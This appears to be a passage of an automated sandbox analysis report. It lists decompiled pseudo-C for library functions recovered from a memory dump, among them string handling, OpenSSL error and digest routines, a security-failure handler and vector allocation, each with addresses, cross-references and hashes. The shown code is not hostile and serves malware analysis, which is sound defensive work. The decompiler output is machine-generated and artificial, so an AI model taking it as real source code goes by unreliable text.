									_a4 =  *_t251;
								}
								if(_t171 < 8) {
									_t241 = _t251;
								} else {
									_t241 =  *_t251;
								}
								_t172 = _v8;
								if(_v8 != 0) {
									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
									_t195 = _a12;
									_t259 = _t259 + 0xc;
								}
								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
									_t195 =  *_t195;
								}
								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
									_t224 = _t251;
								} else {
									_t224 =  *_t251;
								}
								_t173 = _a20;
								if(_a20 != 0) {
									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
								}
							}
							_t212 = _v12;
							 *(_t251 + 0x10) = _t212;
							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
								_t146 = _t251;
								__eflags = 0;
								 *((short*)(_t146 + _t212 * 2)) = 0;
								return _t146;
							} else {
								 *((short*)( *_t251 + _t212 * 2)) = 0;
								return _t251;
							}
						}
					}
				}
			}

0x00414920
0x00414923
0x00414927
0x0041492a
0x0041492d
0x00414932
0x00414c3d
0x00414c3d
0x00414c42
0x00414c47
0x00414c48
0x00414c49
0x00414c4a
0x00414c4b
0x00414c4c
0x00414c4d
0x00414c4e
0x00414c4f
0x00414c53
0x00414938
0x00414938
0x0041493f
0x00414944
0x00000000
0x0041494a
0x0041494e
0x00414951
0x00414957
0x0041495d
0x00414966
0x0041496b
0x00414972
0x00414977
0x0041497c
0x0041497f
0x00414982
0x00414c33
0x00414c38
0x00000000
0x00414988
0x0041498b
0x0041498e
0x00414990
0x00414996
0x00414999
0x0041499c
0x004149a5
0x004149aa
0x004149ad
0x004149b0
0x004149b0
0x004149b5
0x00414a36
0x00414a39
0x00414a3b
0x00414a94
0x00414a96
0x00414af9
0x00414afc
0x00414aff
0x00414b01
0x00414b6c
0x00414b6f
0x00414b72
0x00414b7e
0x00414b74
0x00414b76
0x00414b79
0x00414b79
0x00414b81
0x00414b84
0x00414b8a
0x00414b86
0x00414b86
0x00414b86
0x00414b96
0x00414b9b
0x00414ba1
0x00414ba4
0x00414baa
0x00414ba6
0x00414ba6
0x00414ba6
0x00414bac
0x00414baf
0x00414bb5
0x00414bb1
0x00414bb1
0x00414bb1
0x00414bbf
0x00414bca
0x00414bcf
0x00414bd5
0x00414bd8
0x00414bde
0x00414bda
0x00414bda
0x00414bda
0x00414be0
0x00414be3
0x00414be9
0x00414be5
0x00414be5
0x00414be5
0x00414bf0
0x00414bf4
0x00414bf6
0x00414bf6
0x00414b03
0x00414b03
0x00414b06
0x00414b09
0x00414b0f
0x00414b0b
0x00414b0b
0x00414b0b
0x00414b11
0x00414b14
0x00414b1a
0x00414b16
0x00414b16
0x00414b16
0x00414b2b
0x00414b30
0x00414b36
0x00414b39
0x00414b3f
0x00414b3b
0x00414b3b
0x00414b3b
0x00414b41
0x00414b44
0x00414b61
0x00414b62
0x00414b64
0x00414b46
0x00414b4e
0x00414b4f
0x00414b51
0x00414b51
0x00414b44
0x00414a98
0x00414a98
0x00414a9b
0x00414a9e
0x00414aa4
0x00414aa0
0x00414aa0
0x00414aa0
0x00414aa6
0x00414aa9
0x00414aaf
0x00414aab
0x00414aab
0x00414aab
0x00414ac2
0x00414ac7
0x00414acd
0x00414ad0
0x00414ad6
0x00414ad2
0x00414ad2
0x00414ad2
0x00414ad8
0x00414adb
0x00414aeb
0x00414af0
0x00414af1
0x00414add
0x00414adf
0x00414ae2
0x00414ae3
0x00414ae3
0x00414adb
0x00414bf9
0x00414a3d
0x00414a3d
0x00414a40
0x00414a43
0x00414a49
0x00414a45
0x00414a45
0x00414a45
0x00414a4b
0x00414a4e
0x00414a54
0x00414a50
0x00414a50
0x00414a50
0x00414a5d
0x00414a62
0x00414a68
0x00414a6b
0x00414a71
0x00414a6d
0x00414a6d
0x00414a6d
0x00414a73
0x00414a76
0x00414a7c
0x00414a78
0x00414a78
0x00414a78
0x00414a81
0x00414a86
0x00414a8c
0x00414a8c
0x00414bfc
0x004149b7
0x004149b7
0x004149bd
0x004149c6
0x004149bf
0x004149c1
0x004149c1
0x004149cc
0x004149d2
0x004149ce
0x004149ce
0x004149ce
0x004149d4
0x004149d9
0x004149f1
0x004149f6
0x004149f9
0x004149f9
0x00414a00
0x00414a02
0x00414a02
0x00414a08
0x00414a0e
0x00414a0a
0x00414a0a
0x00414a0a
0x00414a10
0x00414a15
0x00414a29
0x00414a2e
0x00414a15
0x00414c08
0x00414c0b
0x00414c0f
0x00414c23
0x00414c25
0x00414c29
0x00414c30
0x00414c11
0x00414c16
0x00414c20
0x00414c20
0x00414c0f
0x00414982
0x00414944

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t96;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				signed int _t109;
				signed int _t113;
				intOrPtr _t118;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t142;
				signed int _t144;
				void* _t151;

				_t101 = __ebx;
				_t130 = _a12;
				_t142 = __ecx;
				if(_t130 == 0) {
					L13:
					_t64 =  *(_t142 + 0x10);
					_t109 = _a4;
					__eflags = _t64 - _t109;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L44;
					} else {
						_t122 = _t64 - _t109;
						_t109 = _a16;
						_push(_t101);
						_t105 = _a8;
						__eflags = _t122 - _t105;
						_t101 =  <  ? _t122 : _t105;
						_t73 = _t64 - _t101;
						_a8 = _t73;
						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
						if(__eflags <= 0) {
							L44:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t101);
							_push(_t142);
							_push(_t130);
							_t131 = _v20;
							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
								_t109 =  *_t109;
							}
							_t102 = _a12;
							__eflags = _t132 - _t102;
							_t144 =  <  ? _t132 : _t102;
							__eflags = _t144;
							if(_t144 == 0) {
								L51:
								_t67 = 0;
								__eflags = 0;
							} else {
								_t120 = _a8;
								while(1) {
									__eflags =  *_t109 -  *_t120;
									if( *_t109 !=  *_t120) {
										break;
									}
									_t109 = _t109 + 2;
									_t120 = _t120 + 2;
									_t144 = _t144 - 1;
									__eflags = _t144;
									if(_t144 != 0) {
										continue;
									} else {
										goto L51;
									}
									goto L52;
								}
								_t71 =  *_t109 & 0x0000ffff;
								__eflags = _t71 -  *_t120;
								asm("sbb eax, eax");
								_t67 = (_t71 & 0xfffffffe) + 1;
							}
							L52:
							__eflags = _t67;
							if(_t67 != 0) {
								L57:
								return _t67;
							} else {
								__eflags = _t132 - _t102;
								if(_t132 >= _t102) {
									__eflags = _t132 - _t102;
									_t63 = _t132 != _t102;
									__eflags = _t63;
									_t67 = 0 | _t63;
									goto L57;
								} else {
									_t69 = _t67 | 0xffffffff;
									__eflags = _t69;
									return _t69;
								}
							}
						} else {
							_t123 = _t122 - _t101;
							_v12 = _t123;
							__eflags = _t109 - _t101;
							if(_t109 < _t101) {
								_t88 =  *((intOrPtr*)(_t142 + 0x14));
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_a8 = _t142;
								} else {
									_a8 =  *_t142;
									_t130 = _a12;
								}
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_v8 = _t142;
								} else {
									_v8 =  *_t142;
								}
								__eflags = _t123;
								if(_t123 != 0) {
									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
									_t130 = _a12;
									_t151 = _t151 + 0xc;
									_t109 = _a16;
								}
							}
							__eflags = _t109;
							if(_t109 != 0) {
								L26:
								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_t113 = _a16;
									__eflags = _t101 - _t113;
									if(_t101 >= _t113) {
										_t107 = _a4;
									} else {
										_t82 =  *((intOrPtr*)(_t142 + 0x14));
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_t125 = _t142;
										} else {
											_t125 =  *_t142;
										}
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_a12 = _t142;
										} else {
											_a12 =  *_t142;
										}
										_t107 = _a4;
										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
										_t113 = _a16;
										_t151 = _t151 + 4;
									}
									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
										_t124 = _t142;
									} else {
										_t124 =  *_t142;
									}
									__eflags = _t113;
									if(_t113 != 0) {
										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
									}
									E00414DF0(_t142, _a8);
								}
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									goto L26;
								}
							}
							return _t142;
						}
					}
				} else {
					_t118 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t118 < 8) {
						_t96 = __ecx;
					} else {
						_t96 =  *__ecx;
					}
					if(_t130 < _t96) {
						goto L13;
					} else {
						if(_t118 < 8) {
							_t128 = _t142;
						} else {
							_t128 =  *_t142;
						}
						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
							goto L13;
						} else {
							if(_t118 < 8) {
								_t99 = _t142;
							} else {
								_t99 =  *_t142;
							}
							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
						}
					}
				}
			}

0x00417d50
0x00417d58
0x00417d5b
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d71
0x00000000
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d86
0x00000000
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417dae
0x00417dae
0x00417d86
0x00417d71

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004516A0(void* __ebx, void* __edi) {
				char* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t16;
				char** _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
				_t22 = _t21 + 0x10;
				if( *0x50b6d4 != 0) {
					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
					_t23 = _t22 + 0x20;
					__eflags =  *0x50b6d4;
					if( *0x50b6d4 != 0) {
						_push(__ebx);
						_push(__edi);
						_t12 = 1;
						_t16 = 0x5117e0;
						_t19 = 0x5113e4;
						do {
							__eflags =  *_t19;
							 *((intOrPtr*)(_t19 - 4)) = _t12;
							if(__eflags == 0) {
								_push(_t12);
								_t6 = E004C5D39(_t12, _t14, __eflags);
								_t23 = _t23 + 4;
								__eflags = _t6;
								if(_t6 != 0) {
									E004C5E00(_t16, _t6, 0x20);
									_t23 = _t23 + 0xc;
									_t16[0x1f] = 0;
									 *_t19 = _t16;
								}
								__eflags =  *_t19;
								if( *_t19 == 0) {
									 *_t19 = "unknown";
								}
							}
							_t19 =  &(_t19[2]);
							_t12 = _t12 + 1;
							_t16 =  &(_t16[0x20]);
							__eflags = _t19 - 0x5117d4;
						} while (_t19 <= 0x5117d4);
						 *0x50b6d4 = 0;
						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
					} else {
						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
					}
				} else {
					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
				}
			}

0x004516ae
0x004516b3
0x004516bd
0x004516e4
0x004516f7
0x004516fc
0x004516ff
0x00451706
0x0045171f
0x00451721
0x00451722
0x00451727
0x0045172c
0x00451731
0x00451731
0x00451734
0x00451737
0x00451739
0x0045173a
0x0045173f
0x00451742
0x00451744
0x0045174a
0x0045174f
0x00451752
0x00451756
0x00451756
0x00451758
0x0045175b
0x0045175d
0x0045175d
0x0045175b
0x00451763
0x00451766
0x00451767
0x0045176a
0x0045176a
0x00451780
0x00451795
0x00451708
0x0045171e
0x0045171e
0x004516bf
0x004516d5
0x004516d5

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x50ad20; // 0x727261cc
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x510e38 = _t9;
				 *0x510e34 = _t23;
				 *0x510e30 = _t26;
				 *0x510e2c = _t22;
				 *0x510e28 = _t28;
				 *0x510e24 = _t27;
				 *0x510e50 = ss;
				 *0x510e44 = cs;
				 *0x510e20 = ds;
				 *0x510e1c = es;
				 *0x510e18 = fs;
				 *0x510e14 = gs;
				asm("pushfd");
				_pop( *0x510e48);
				 *0x510e3c =  *_t30;
				 *0x510e40 = _v0;
				 *0x510e4c =  &_a4;
				 *0x510d88 = 0x10001;
				_t14 =  *0x510e40; // 0x0
				 *0x510d44 = _t14;
				 *0x510d38 = 0xc0000409;
				 *0x510d3c = 1;
				 *0x510d48 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x50ad20; // 0x727261cc
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x50ad24; // 0x8d8d9e33
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0042AB4B(_t19 << 0, "8\rQ");
			}

0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a784
0x0042a786
0x0042a786
0x0042ab89
0x0042ab93
0x0042ab9a
0x0042ab9e
0x0042ab9f
0x0042ab9f
0x0042aba1
0x0042aba6
0x0042abac
0x0042abb2
0x0042abb8
0x0042abbe
0x0042abc4
0x0042abcb
0x0042abd2
0x0042abd9
0x0042abe0
0x0042abe7
0x0042abee
0x0042abef
0x0042abf8
0x0042ac00
0x0042ac08
0x0042ac13
0x0042ac1d
0x0042ac22
0x0042ac27
0x0042ac31
0x0042ac3b
0x0042ac47
0x0042ac4b
0x0042ac57
0x0042ac5b
0x0042ac61
0x0042ac67
0x0042ac6b
0x0042ac71
0x0042ac82

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t32;

				_t18 = __ecx;
				_t25 = __ecx;
				_push(__edi);
				_t22 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t22 == 0) {
					L4:
					return _t25;
				} else {
					_t36 = _t22 - 0xffffffff;
					if(_t22 > 0xffffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L6;
					} else {
						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
						_t32 = _t32 + 4;
						if(_t15 == 0) {
							L6:
							E0044F1BB(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_t27 = _t18;
							_t14 =  *_t27;
							__eflags = _t14;
							if(_t14 != 0) {
								_t14 = L00422587(_t14);
								 *_t27 = 0;
								 *((intOrPtr*)(_t27 + 4)) = 0;
								 *((intOrPtr*)(_t27 + 8)) = 0;
							}
							return _t14;
						} else {
							 *_t25 = _t15;
							 *((intOrPtr*)(_t25 + 4)) = _t15;
							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
							E0042B420(_t15, 0, _t22);
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
							goto L4;
						}
					}
				}
			}

0x00413c40
0x00413c44
0x00413c46
0x00413c47
0x00413c4a
0x00413c50
0x00413c57
0x00413c60
0x00413c8e
0x00413c93
0x00413c62
0x00413c62
0x00413c65
0x00413c96
0x00413c9b
0x00000000
0x00413c67
0x00413c68
0x00413c6d
0x00413c72
0x00413ca0
0x00413ca0
0x00413ca5
0x00413ca6
0x00413ca7
0x00413ca8
0x00413ca9
0x00413caa
0x00413cab
0x00413cac
0x00413cad
0x00413cae
0x00413caf
0x00413cb0
0x00413cb1
0x00413cb3
0x00413cb5
0x00413cb7
0x00413cba
0x00413cc2
0x00413cc8
0x00413ccf
0x00413ccf
0x00413cd7
0x00413c74
0x00413c78
0x00413c7d
0x00413c80
0x00413c83
0x00413c8b
0x00000000
0x00413c8b
0x00413c72
0x00413c65

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: f83b383ca6d2919a4d8d247e3e36b4910671b137cc7c3380ba7a871b92ce42e9
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: f83b383ca6d2919a4d8d247e3e36b4910671b137cc7c3380ba7a871b92ce42e9
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;
				void* _t32;

				_t29 = _a4;
				_t10 =  *_t29;
				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
					_t31 = _t31 + 0xc;
				}
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
				_t26 = _a12;
				_t32 = _t31 + 8;
				_t28 = _t13;
				if(_t26 != 0) {
					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
				}
				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
				if(_t15 != 0) {
					 *_t15(_t29);
					E0047D100(_t29, 2);
					_t32 = _t32 + 0xc;
				}
				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
				return _t28;
			}

0x00480621
0x00480626
0x00480628
0x0048062c
0x0048063d
0x00480642
0x00480642
0x0048064f
0x00480651
0x00480655
0x00480658
0x0048065c
0x00480663
0x00480663
0x00480667
0x0048066c
0x0048066f
0x00480674
0x00480679
0x00480679
0x00480686
0x00480692

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

